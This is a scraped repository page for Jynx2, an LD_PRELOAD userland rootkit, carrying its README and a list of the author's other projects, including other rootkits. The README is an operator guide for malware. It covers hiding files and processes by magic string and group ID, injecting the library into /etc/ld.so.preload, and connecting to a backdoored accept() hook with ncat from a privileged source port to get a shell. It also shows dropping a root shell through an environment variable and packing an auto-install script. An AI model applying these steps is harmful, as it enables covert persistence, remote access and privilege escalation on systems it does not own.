chokepoint/Jynx2 chokepoint/Jynx2

  • Stars
    star
    158
  • Rank 237,131 (Top 5 %)
  • Language
    C
  • Created almost 12 years ago
  • Updated almost 12 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
chokepoint/Jynx2
github

chokepoint

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

JynxKit2 is an LD_PRELOAD userland rootkit based on the original JynxKit. The backdoor has been replaced with an "accept()" system hook. 
                _   _,.-.' .-.
            _ .' |,'   ."".| |.""._
           ( || ,',"". `._`' `  '  `.
           `\ | `" .-"`-..`     .    `.
            |     `..--.._       |     \
          _,|      _...'_.'     ,+.     `.
     ,""'|   `...-'..""(__.._ -"   `"--.. `.
    |`._,'  ,'  /\ .'""` .'""`. `.    |  `. \
    '      / / /  ||    ||    |.`.`.   .   | \
     `.__,'-._'  /|` -"'  `-.'  \ \ \   `"-'  \
      ' `.   /  /_| | |'""| | .-""'`'"`-,.-"\  .
     . / .\ .  /  | | `._.' ||        ,'     \  \
    ' / / |/  /_.-+._`-..--"-.       .   .    \  `
   / /.'  '  ,'""'-. `"."'""'`..     |.        \  \
  / . |  j  .       . |        |\__," |.  `    '   \
 .  | |  |  |       ' |        '|   | ' `  \    \   .
 |    |  |  `.____,'   ..____,' |   |    .       \
 |    |  |  | ._  _..---._   _,'    |       .        '
 |    |  |  | | ""  .    |`"'   \ `.|     '  '  '     .
 |    |  |  | |     |    |       `  `      .  .  \    |
 |    |  |  | |     '    |        \  `.    |  |   .   |
 '    '  |  | |      .   `         \   \   |  |   |   |
  \      `  | |      |              .   `. |  |   |   |
   \      \ ' |      `    '          `    `+..|___|___|_........
    \      \ \|       '    .           `.    `.                 |
     `.     \ .        .   `             `.    `-.            .'
    _,'`.    \'         .   \              `-.._  `._       ,'
 _."     `._ `.`        |    .                       `._   .
`._       _,`"--`.      |     .                         `. |
   `-._ ,'              |      `.                         `|_
      ,'         |      |        `.                          `.
    .'   __...__.|      |          \ __..._     _,..,.__       `.
    `-`"'        `._..--'-.__      .'      `-..'        ``'"--..-'
                             `"---' 
			     
			     
    /$$$$$                                      /$$   /$$ /$$   /$$    
   |__  $$                                     | $$  /$$/|__/  | $$    
      | $$ /$$   /$$ /$$$$$$$  /$$   /$$       | $$ /$$/  /$$ /$$$$$$  
      | $$| $$  | $$| $$__  $$|  $$ /$$//$$$$$$| $$$$$/  | $$|_  $$_/  
 /$$  | $$| $$  | $$| $$  \ $$ \  $$$$/|______/| $$  $$  | $$  | $$    
| $$  | $$| $$  | $$| $$  | $$  >$$  $$        | $$\  $$ | $$  | $$ /$$
|  $$$$$$/|  $$$$$$$| $$  | $$ /$$/\  $$       | $$ \  $$| $$  |  $$$$/
 \______/  \____  $$|__/  |__/|__/  \__/       |__/  \__/|__/   \___/  
           /$$  | $$                                                   
          |  $$$$$$/                                                   
           \______/            


	               BlackHatAcademy.org
		          ErrProne / XO
		     
File list: config.h jynx2.c reality.c Makefile packer.sh README

0x01. Setting up config.h.

	First of all, you need to dig into config.h, and ensure that the settings meet your needs.
MAGIC_STRING should be changed to the name of the directory you want to hide from the system. This can
be used as a prefix to your main directory as well as for files. MAGIC_GID will be the Group ID to
hide as well. Make sure that you set MAGIC_DIR Group ID to MAGIC_GID for hiding purposes as well.
This will help disguise the processes from the system, including commands like ps. CONFIG_FILE 
defaults to ld.so.preload, which is usually located in /etc. You shouldn't have to change this 
unless you're going to dig a little deeper into hiding Jynx-Kit. MAGIC_ACK and MAGIC_SEQ have been 
dropped in Jynx2, since the new backdoor hooks accept() system call, and still includes SSL support. 
After installing Jynx2, ensure that you restart the daemon that you want to use as the backdoor. 

0x02. The accept backdoor.

	LOW_PORT and HIGH_PORT are the first of the two part new two factor authentication. The source 
port of your connect client must fall between this port range, and since you have to be root in order 
to use this port range, it ensures that no random connections will match this criteria. SHELL_PASSWORD 
will be the password used for the second factor of authentication, and should be the first line sent to 
the backdoor upon connecting. For instance say we have port 80 backdoored. Our client will connect like so.
Make sure you are using the ssl flag with ncat.

# sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia 
 214473 drwxr-xr-x  2 errprone users   176 Mar  7 19:19 .
 177137 drwxr-xr-x 15 errprone users   952 Mar  5 22:15 ..

0x03. Drop a local suid shell.

	A new feature is also being able to drop a local suid shell using ENV_VARIABLE set in config.h
To drop a shell, simply set the defined user variable, and make a call to a program with euid of 0.
For instance you can do the following.

# XxJynx=hahahax sudo
# whoami
root

0x04. Configuring Makefile and Installing.

	Once you have this configured, go ahead and open up Makefile. Make sure that MAGIC_GID 
matches what you have in config.h. INSTALL should be set to the directory that you want to hide
your files in. You can also set these variables upon calling "make install." See examples below.

# make all              # compile jynx2.so
# make install		# Installs jynx2, injects into ld preload, and sets correct GIDs
# make install INSTALL=/omgxochi MAGIC_GID=100 

	he last line installs the kit to /omgxochi, and sets the GID to 100. You should use GID
of 100 for anything that you're going to run, and need to hide from the system.


0x05. packer.sh
	Now that you have everything configured and things compile correctly, you can use packer.sh
in order to create an auto install shell script for future installations. Simply remove the last 2 lines
from config.h, run packer.sh, and it will generate a new autokit.sh. ONLY RUN autokit.sh ON THE SYSTEM
YOU WANT TO INJECT.

More Repositories

1

azazel

Azazel is a userland rootkit based off of the original LD_PRELOAD technique from Jynx rootkit. It is more robust and has additional features, and focuses heavily around anti-debugging and anti-detection.
C
771
star
2

CryptHook

TCP/UDP symmetric encryption tunnel wrapper
C
117
star
3

Beleth

Multi-threaded SSH Password Auditor
C
92
star
4

flaskgur

Simple image hosting site written with Flask and Python
Python
83
star
5

jynxkit

JynxKit is an LD_PRELOAD userland rootkit for Linux systems with reverse connection SSL backdoor
C
56
star
6

pytinydns

PYTinyDNS
Python
54
star
7

crunchpwn

#Pwn Linux (CrunchPwn) is a penetration testing repository/addition for CrunchBang Linux.
27
star
8

stampauth

SSH Two-factor Authentication Module in Python
Python
15
star
9

fbpic2id

Identify the owner of a Facebook image given a direct link to one of their photos.
Python
12
star
10

PiBowl

Automatic secured telecommunication network setup and configuration using Asterisk.
Shell
12
star
11

BNPinCoverage

Visually analyze basic block code coverage in Binary Ninja using Pin output.
Python
11
star
12

seqack

SEQ/Ack signature triggered SSL back connect
C
10
star
13

Andrena

Simple multi-stream protocol for use with ZigBee wireless modules. Adds an additional layer of encryption and allows advanced streams such as file transfers.
Python
9
star
14

FishBowl

Fish Bowl is based on the NSA approved communication SVoIP Infrastructure as set forth in their Mobility Capability Package.
Shell
6
star
15

DUKPT

Derived unique key per transaction implementation in Python
Python
6
star
16

BasicBlocks

Pin tool for printing the address of each basic block executed in a program.
C++
6
star
17

UnicodeFuzzer

Generate random unicode based on a file of ranges.
Python
6
star
18

CPBBS

ChokePoint BBS (Bulletin Board System). Attaches to a modem using agetty, a tcp/ip port using netcat, or use it as a login shell for ssh.
5
star
19

Ataraxpy

Python2 IRC bot wrapping framework for rapid development
Python
4
star
20

odessa

Very basic example of an IRC bot to manage a channel (written in C).
C
2
star
21

ormclass

PHP
1
star